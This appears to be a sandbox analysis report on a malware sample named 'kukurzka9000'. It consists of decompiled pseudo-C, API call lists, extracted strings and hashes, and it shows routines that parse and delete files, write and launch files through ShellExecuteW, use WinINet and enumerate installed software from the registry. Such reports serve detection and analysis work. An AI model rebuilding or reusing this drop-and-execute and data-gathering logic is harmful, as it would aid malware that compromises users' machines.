				_v36 = _t111;
				_t264 =  *((intOrPtr*)( *0x40e000))(_t110, _a4,  *0x40e300);
				_v68 = _t264;
				_t113 = E0040A69E( *0x40e000,  &_v36);
				_t209 = _v36;
				if(_t113 == 0) {
					L48:
					LocalFree(_t264);
					DeleteFileW(_t209);
					LocalFree(_t209);
					L49:
					goto L50;
				}
				_push(0);
				_push(_t209);
				_push(_t264);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L48;
				}
				_t119 =  *((intOrPtr*)( *0x40e03c))(_t209, 0x80000000, 1, 0, 3, 0, 0);
				_v72 = _t119;
				_t270 =  *((intOrPtr*)( *0x40e14c))(_t119, 0);
				_t121 =  *((intOrPtr*)( *0x40e044))(0x40, _t270);
				_push(0);
				_push( &_v76);
				_t18 = _t270 - 1; // -1
				_v44 = _t121;
				_push(_t121);
				_push(_v72);
				if( *((intOrPtr*)( *0x40e088))() == 0) {
					L43:
					LocalFree(_v44);
					CloseHandle(_v72);
					DeleteFileW(_t209);
					if(_t264 != 0) {
						LocalFree(_t264);
					}
					if(_t209 != 0) {
						LocalFree(_t209);
					}
					return 1;
				}
				_t271 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_t22 = _t271 + 0x40; // 0x40
				_t132 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
				_v40 = _t132;
				if(_t271 == 0) {
					L7:
					_push(_v40);
					_t133 =  *0x40e490; // 0x0
					if( *_t133() != 0) {
						L42:
						 *0x40e4a8();
						LocalFree(_v40);
						goto L43;
					}
					_t228 = _v44;
					_t265 = _t228;
					_push(_t228);
					_v32 = _t265;
					_t273 = 1;
					if( *((intOrPtr*)( *0x40e198))() <= 0x200) {
						L41:
						_t264 = _v68;
						goto L42;
					}
					while(_t273 != 0) {
						_v60 = _v60 & 0x00000000;
						_t140 =  *((intOrPtr*)( *0x40e00c))(_t265, _v48);
						_v20 = _v20 | 0xffffffff;
						_t210 = _t140;
						_v16 = _v16 | 0xffffffff;
						if(_t210 == 0) {
							break;
						}
						_t211 = _t210 - _t265;
						if(_t210 - _t265 < 0) {
							break;
						}
						_t142 =  *((intOrPtr*)( *0x40e00c))(_t265, _v80);
						if(_t142 == 0) {
							_t273 = 0;
						} else {
							_v20 = _t142 - _t265;
						}
						_v8 = _t273;
						_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_a8 = _t144;
						_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_v24 = _t146;
						_t147 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_push(_v20);
						_v28 = _t147;
						if(E0040A457(_t265,  &_a8,  *((intOrPtr*)( *0x40e198))() + _t211, _v48) == 0) {
							L38:
							LocalFree(_a8);
							LocalFree(_v24);
							LocalFree(_v28);
							_t212 = _v16;
							if(_t212 < 0) {
								break;
							}
							_t265 = _t265 +  *((intOrPtr*)( *0x40e198))(_v64) + _t212;
							_push(_t265);
							_v32 = _t265;
							if( *((intOrPtr*)( *0x40e198))() > 0x200) {
								continue;
							}
							break;
						} else {
							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
							_v12 = _t160;
							_t163 = MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, 0, 0);
							_v20 = _t163;
							if(_t163 != 0) {
								_t267 = _t163 + _t163;
								_t196 =  *((intOrPtr*)( *0x40e044))(0x40, _t267);
								_t216 = _t196;
								MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, _t216, _v20);
								 *((short*)(_t267 + _t216 - 2)) = 0;
								_v12 =  *((intOrPtr*)( *0x40e13c))(_v12, _t216);
								LocalFree(_t216);
								_t265 = _v32;
								_v60 = 1;
							}
							_t165 =  *((intOrPtr*)( *0x40e00c))(_t265, _v52);
							if(_t165 == 0) {
								L36:
								_t273 = 0;
								L37:
								LocalFree(_v12);
								goto L38;
							}
							_t273 = _v8;
							_t167 = _t165 - _t265;
							_v20 = _t167;
							if(_t167 < 0) {
								goto L37;
							}
							_t213 =  *((intOrPtr*)( *0x40e00c))(_t265, _v56);
							if(_t213 == 0) {
								goto L36;
							}
							_t214 = _t213 - _t265;
							if(_t214 >= 0) {
								_push(_t214);
								if(E0040A457(_t265,  &_v24,  *((intOrPtr*)( *0x40e198))() + _v20, _v52) != 0) {
									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
									E00406468(_v24,  &_v20);
									_t240 =  *((intOrPtr*)( *0x40e00c))(_t265, _v64);
									if(_t240 == 0) {
										_t273 = 0;
									} else {
										_t241 = _t240 - _t265;
										_v92 = _t241;
										_v16 = _t241;
										if(_t241 >= 0) {
											_push(_t241);
											_v16 = _t241;
											if(E0040A457(_t265,  &_v28,  *((intOrPtr*)( *0x40e198))() + _t214, _v56) != 0) {
												_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
												if(E00406468(_v28,  &_v16) != 0 && _v60 != 0) {
													_t190 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
													_t215 = _t190;
													_t191 =  *((intOrPtr*)( *0x40e0ec))(_t215,  *0x40e1a4, _v12, _v20, _v16);
													_t278 = _t278 + 0x14;
													if(_t191 >= lstrlenW( *0x40e1a4)) {
														_t276 = _v84;
														 *_t276 = E0040A503( *_t276, _t215);
													}
													if(_t215 != 0) {
														LocalFree(_t215);
													}
													_t265 = _v32;
													 *_v88 =  *_v88 + 1;
												}
												LocalFree(_v16);
												_t273 = _v8;
												_v16 = _v92;
											}
										}
									}
									LocalFree(_v20);
								}
							}
							goto L37;
						}
					}
					_t209 = _v36;
					goto L41;
				}
				_push(0);
				_push(0);
				_push(_t271);
				_push(_t132);
				_push(0xffffffff);
				_push(_a4);
				_push(0);
				_push(0xfde9);
				if( *((intOrPtr*)( *0x40e0e4))() != 0) {
					goto L7;
				} else {
					LocalFree(_v44);
					LocalFree(_t264);
					LocalFree(_t209);
					LocalFree(_v40);
					goto L49;
				}
			}

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(?), ref: 00406E67
LocalFree.KERNEL32(00000000), ref: 00406E6E
LocalFree.KERNEL32(?), ref: 00406E75
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00406F8B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00406FC5
LocalFree.KERNEL32(00000000), ref: 00406FDD
LocalFree.KERNEL32(?), ref: 004071C6
CloseHandle.KERNEL32(?), ref: 004071CF
DeleteFileW.KERNEL32(?), ref: 004071D6
LocalFree.KERNEL32(00000000), ref: 004071E1
LocalFree.KERNEL32(?), ref: 004071EC
LocalFree.KERNEL32(00000000), ref: 004071F8
DeleteFileW.KERNEL32(?), ref: 004071FF
LocalFree.KERNEL32(?), ref: 00407206

Strings

@]m, xrefs: 00406D3F
p]m, xrefs: 00406D50
HXm, xrefs: 00406D68
zh@, xrefs: 00407171, 0040705E, 0040703B

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$ByteCharDeleteFileMultiWide$CloseHandle
String ID: @]m$HXm$p]m$zh@
API String ID: 490209112-1501405340
Opcode ID: c8cbe69cc62f74f5a99b3f19532ac2860d420457c2f59f1cdb0e08b9d8ac2a6d
Instruction ID: f5ae4f6584a7baff5169ccf4eff2fbd10138ea77d31ce010a22c6c2769712165
Opcode Fuzzy Hash: c8cbe69cc62f74f5a99b3f19532ac2860d420457c2f59f1cdb0e08b9d8ac2a6d
Instruction Fuzzy Hash: D6E18471A00215AFEB04DFA6DD85EAEBBB5EF48310F004439FA15B7390DBB46911CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B744F Relevance: 44.2, APIs: 22, Strings: 3, Instructions: 477networkfileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B75C1
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B764A
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7651
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7658
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7661
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7696
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B769D
CloseHandle.KERNEL32(-00000004,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77A4
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77B3
DeleteFileW.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77C2
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77CB
LocalFree.KERNEL32(0000002F,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77D4
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B7855
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 022B7886
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 022B7895
InternetCloseHandle.WININET(?), ref: 022B7961
InternetCloseHandle.WININET(00000000), ref: 022B796D
InternetCloseHandle.WININET(00000000), ref: 022B7974
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79E2
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79EB
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79F2
LocalFree.KERNEL32(00000001,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79FB

Strings

`4k, xrefs: 022B7551
/, xrefs: 022B74C5
hm, xrefs: 022B7736

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$Internet$CloseHandle$Option$DeleteFile
String ID: /$`4k$hm
API String ID: 3877996606-3423171968
Opcode ID: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
Instruction ID: 55067e16d96285742e21cc3409e782e22672e5ba52338070523b27c36997fa34
Opcode Fuzzy Hash: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
Instruction Fuzzy Hash: 0A02A071A10215AFDB15DBF5DD44EAEB7B6EF88340F108828EA01B72A4DB74AD50CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004073C7 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 315
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004073C7() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t65;
				void* _t72;
				void* _t79;
				void* _t86;
				void* _t97;
				void* _t108;
				void* _t122;
				void* _t123;
				char _t128;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t142;
				void* _t144;
				void* _t183;
				intOrPtr _t188;
				void* _t189;
				void* _t190;
				void* _t192;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				signed int _t205;
				void* _t207;
				signed int _t209;
				void* _t211;
				signed int _t213;
				void* _t215;
				signed int _t217;
				char _t218;
				void* _t219;
				void* _t222;
				void* _t223;

				_t190 =  *((intOrPtr*)( *0x40e18c))(_t144,  *0x40e3a0, _t189);
				if(_t190 == 0) {
					L41:
					return 0;
				} else {
					while(1) {
						_t192 = _t190 + 8;
						_t65 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t192) + _t63);
						_t137 = _t65;
						_v20 = _t137;
						_t202 =  *((intOrPtr*)( *0x40e18c))(_t192,  *0x40e1f0);
						if(_t202 == 0) {
							break;
						}
						_t205 = _t202 - _t192 >> 1;
						if(E0040A3E4(_t192,  &_v20, 0, _t205) == 0) {
							_t137 = _v20;
							break;
						}
						_t194 = _t192 + _t205 * 2 + 2;
						_t72 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t194) + _t70);
						_t139 = _t72;
						_v12 = _t139;
						_t207 =  *((intOrPtr*)( *0x40e18c))(_t194,  *0x40e20c);
						if(_t207 == 0) {
							L36:
							LocalFree(_t139);
							L34:
							LocalFree(_v20);
							L39:
							L40:
							goto L41;
						}
						_t209 = _t207 - _t194 >> 1;
						if(E0040A3E4(_t194,  &_v12, 0, _t209) == 0) {
							_t139 = _v12;
							goto L36;
						}
						_t196 = _t194 + _t209 * 2 + 2;
						_t79 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t196) + _t77);
						_t140 = _t79;
						_v8 = _t140;
						_t211 =  *((intOrPtr*)( *0x40e18c))(_t196,  *0x40e20c);
						if(_t211 == 0) {
							L33:
							LocalFree(_t140);
							LocalFree(_v12);
							goto L34;
						}
						_t213 = _t211 - _t196 >> 1;
						if(E0040A3E4(_t196,  &_v8, 0, _t213) == 0) {
							_t140 = _v8;
							goto L33;
						}
						_t198 = _t196 + _t213 * 2 + 2;
						_t86 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t198) + _t84);
						_t137 = _t86;
						_v16 = _t137;
						_t215 =  *((intOrPtr*)( *0x40e18c))(_t198,  *0x40e228);
						if(_t215 == 0) {
							L31:
							LocalFree(_v12);
							LocalFree(_v20);
							L29:
							break;
						}
						_t217 = _t215 - _t198 >> 1;
						if(E0040A3E4(_t198,  &_v16, 0, _t217) == 0) {
							_t137 = _v16;
							goto L31;
						}
						_t15 = _t217 + 1; // 0x1
						_t199 = _v20;
						_v32 = _t198 + _t15 * 2;
						_push(_t199);
						if( *((intOrPtr*)( *0x40e074))() != 1) {
							_push(_t199);
							if( *((intOrPtr*)( *0x40e074))() != 2) {
								_push(_t199);
								if( *((intOrPtr*)( *0x40e074))() == 3) {
									ShellExecuteW(0, L"open", _v16, _v12, 0, 0);
								}
							}
							L24:
							_t97 = _v8;
							L25:
							LocalFree(_t97);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							_t190 =  *((intOrPtr*)( *0x40e18c))(_v32,  *0x40e3a0);
							if(_t190 != 0) {
								continue;
							}
							goto L40;
						}
						_t97 = _v8;
						if( *_t97 != 0x25) {
							goto L25;
						}
						_t21 = _t97 + 2; // 0x407c02
						_t218 = _t21;
						_v24 = _t218;
						_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_t137 = _t108;
						_v20 = _t137;
						_t219 =  *((intOrPtr*)( *0x40e18c))(_t218,  *0x40e364);
						if(_t219 == 0) {
							L28:
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							goto L29;
						}
						_t221 = _t219 - _v24 >> 1;
						if(E0040A3E4(_v24,  &_v20, 0, _t219 - _v24 >> 1) == 0) {
							_t137 = _v20;
							goto L28;
						}
						_t142 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_push(0x208);
						_push(_t142);
						_push(_v20);
						if( *((intOrPtr*)( *0x40e15c))() != 0) {
							_t222 = E0040A503(_t142, _v24 + 2 + _t221 * 2);
							_t122 =  *((intOrPtr*)( *0x40e044))(0x40, 0x209);
							_t183 = 8;
							_t123 = E0040A05F(_t122, _t183);
							_t143 = _t123;
							_push(_t222);
							_v28 = _t123;
							if( *((short*)(_t222 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x5c) {
								_t188 =  *0x40e258; // 0x6e7a78
								_t222 = E0040A503(_t222, _t188);
							}
							_t142 = E0040A503(E0040A503(E0040A503(_t222, _t143), "."), _v16);
							_t128 =  *0x40e374; // 0x6b96c0
							_v24 = _t128;
							_t223 = E00408619( &_v24);
							if(E00408495(_v12, _t223, _t142) != 0) {
								ShellExecuteW(0, 0, _t142, 0, 0, 0);
							}
							LocalFree(_v28);
							LocalFree(_t223);
						}
						LocalFree(_t142);
						LocalFree(_v20);
						goto L24;
					}
					LocalFree(_t137);
					goto L39;
				}
			}

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004073FE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407762

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 00407452
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074A6
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074FA
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407673
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040767C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407683
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040768A
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407693

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 004076C3
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 004076CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076D6
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076DD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076E6
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 0040770E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407717
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040771E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407727
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407735
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407744
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040774D

Strings

open, xrefs: 004076BD
xzn, xrefs: 00407619

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$ExecuteShelllstrlen$Global
String ID: open$xzn
API String ID: 4025529775-4107417138
Opcode ID: a1c46eef3cfaacafb93fa33fc14c73831b07a4a1779f76e502dab9b557ed458a
Instruction ID: c37f464f11a496ac5bed0fa78998882daeccb467a6fdaf8c4272b4e6ddd95f6a
Opcode Fuzzy Hash: a1c46eef3cfaacafb93fa33fc14c73831b07a4a1779f76e502dab9b557ed458a
Instruction Fuzzy Hash: 54A1FA72E00215AFDB149BA6DE84D7E7BB5EB44310B004835E905F73A1DB78BD11CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409581 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 309registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

RegCloseKey.ADVAPI32(00000000), ref: 004095C6
LocalFree.KERNEL32(00000000), ref: 00409631
RegCloseKey.ADVAPI32(000F003F), ref: 0040963A
RegCloseKey.ADVAPI32(00000000), ref: 0040974E
LocalFree.KERNEL32(00000000), ref: 004097D7
RegCloseKey.ADVAPI32(000F003F), ref: 004097E0

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004095B3, 00409763
%s %s, xrefs: 004096E0, 00409886
DisplayName, xrefs: 00409683, 00409829
DisplayVersion, xrefs: 004096BC, 00409862
?, xrefs: 00409591

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Close$Free$Locallstrlen$Global
String ID: %s %s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 4129056489-2725056526
Opcode ID: 0d3dbb5b45545043f816d409d6e6463967e53ce16be53e8c1f48be56fbdb61cf
Instruction ID: d80988b05da4082da03304b58d54d9122d1b9f20f569912955d0e5abbda793b7
Opcode Fuzzy Hash: 0d3dbb5b45545043f816d409d6e6463967e53ce16be53e8c1f48be56fbdb61cf
Instruction Fuzzy Hash: 60B16C71A00219BFDB05DFA6DD84EAF7BB9EF49340B104425FA05B7261D7749E10CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B629A Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 419fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(?), ref: 022B63DB
LocalFree.KERNEL32(00000000), ref: 022B63E2
LocalFree.KERNEL32(?), ref: 022B63E9
LocalFree.KERNEL32(00000000), ref: 022B6551
LocalFree.KERNEL32(?), ref: 022B673A
CloseHandle.KERNEL32(?), ref: 022B6743
DeleteFileW.KERNEL32(?), ref: 022B674A
LocalFree.KERNEL32(00000000), ref: 022B6755
LocalFree.KERNEL32(?), ref: 022B6760
LocalFree.KERNEL32(00000000), ref: 022B676C
DeleteFileW.KERNEL32(?), ref: 022B6773
LocalFree.KERNEL32(?), ref: 022B677A

Strings

@]m, xrefs: 022B62B3
p]m, xrefs: 022B62C4
HXm, xrefs: 022B62DC

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile$CloseHandle
String ID: @]m$HXm$p]m
API String ID: 3365615635-2417607449
Opcode ID: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
Instruction ID: a05e1c0f79cbee2ed377cd0a410dac8088eafde908eb897f04af7a6cd0a0ee24
Opcode Fuzzy Hash: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
Instruction Fuzzy Hash: 1BE18271910215AFEB059FE6DD84AFEBBB9EF48350F004424FA15B7264DBB49910CF64

Uniqueness

Uniqueness Score: -1.00%

Function 022B1D2C Relevance: 37.2, APIs: 20, Strings: 1, Instructions: 419fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B1DB9

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B1E08
LocalFree.KERNEL32(00000000), ref: 022B1E17
LocalFree.KERNEL32(00000000), ref: 022B1E26
LocalFree.KERNEL32(00000000), ref: 022B1E31
LocalFree.KERNEL32(00000000), ref: 022B1E3C
LocalFree.KERNEL32(00000000), ref: 022B1F61
LocalFree.KERNEL32(?), ref: 022B1F68
LocalFree.KERNEL32(00000000), ref: 022B1F94
LocalFree.KERNEL32(?), ref: 022B1F9B
LocalFree.KERNEL32(00000000), ref: 022B2213
DeleteFileW.KERNEL32(?), ref: 022B221A
LocalFree.KERNEL32(?), ref: 022B2221

Strings

xwm, xrefs: 022B2093

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: xwm
API String ID: 2194112602-4141748782
Opcode ID: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
Instruction ID: 0147b1c8f59988e56c0bf04a8f1a755725a381fd016bc4443bf9acdc9186fd1e
Opcode Fuzzy Hash: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
Instruction Fuzzy Hash: 03F19F71910225EFDB06DFA6DE44AEE7BB5FF08300F004924FA15B72A0CB749920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B50CF Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 372COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B5160

Strings

., xrefs: 022B517E
*.lnk, xrefs: 022B5254
xzn, xrefs: 022B5223

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: *.lnk$.$xzn
API String ID: 2826327444-1073973021
Opcode ID: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
Instruction ID: d813e4ec9d2d8e642064f1ddd93c5cbb91b427a00959f023284fc4d1b2bc17cc
Opcode Fuzzy Hash: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
Instruction Fuzzy Hash: 06D1CD71A10216ABDF06DFE5DD44FEE77B6AF48340F004424EA15BB2A0DBB4A961CF64

Uniqueness

Uniqueness Score: -1.00%

Function 022B8AF5 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 309registryCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

RegCloseKey.ADVAPI32(00000000), ref: 022B8B3A
LocalFree.KERNEL32(00000000), ref: 022B8BA5
RegCloseKey.ADVAPI32(000F003F), ref: 022B8BAE
RegCloseKey.ADVAPI32(00000000), ref: 022B8CC2
LocalFree.KERNEL32(00000000), ref: 022B8D4B
RegCloseKey.ADVAPI32(000F003F), ref: 022B8D54

Strings

?, xrefs: 022B8B05

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Close$Free$Local$Global
String ID: ?
API String ID: 669500343-1684325040
Opcode ID: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
Instruction ID: f65215cc359342bce867cb496aa7981f60053896049d0cf11415823135dec60d
Opcode Fuzzy Hash: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
Instruction Fuzzy Hash: 11B18E74A00219BFDB05CFA6DD85EEE7BB9EF49340F104425FA09B6260D7B49A10CB65

Uniqueness

Uniqueness Score: -1.00%

Function 022BA6EB Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 275fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 022BA882
LocalFree.KERNEL32(00000000), ref: 022BA961
LocalFree.KERNEL32(?), ref: 022BA96C
LocalFree.KERNEL32(?), ref: 022BA976
LocalFree.KERNEL32(?), ref: 022BA97D
LocalFree.KERNEL32(00000000), ref: 022BA984
CloseHandle.KERNEL32(?), ref: 022BA98F
DeleteFileW.KERNEL32(?), ref: 022BA996
LocalFree.KERNEL32(?), ref: 022BA9F7
LocalFree.KERNEL32(00000000), ref: 022BA9FE
LocalFree.KERNEL32(?), ref: 022BAA08
LocalFree.KERNEL32(00000000), ref: 022BAA0F
LocalFree.KERNEL32(?), ref: 022BAA18
LocalFree.KERNEL32(00000000), ref: 022BAA1F
DeleteFileW.KERNEL32(?), ref: 022BAA26
LocalFree.KERNEL32(?), ref: 022BAA4D
FindClose.KERNEL32(00000000), ref: 022BAA54

Part of subcall function 022B9C82: LocalFree.KERNEL32(?), ref: 022B9D36

Part of subcall function 022BA6EB: LocalFree.KERNEL32(00000000), ref: 022BA7D1

Strings

., xrefs: 022BA760
`k, xrefs: 022BA8A6

Memory Dump Source

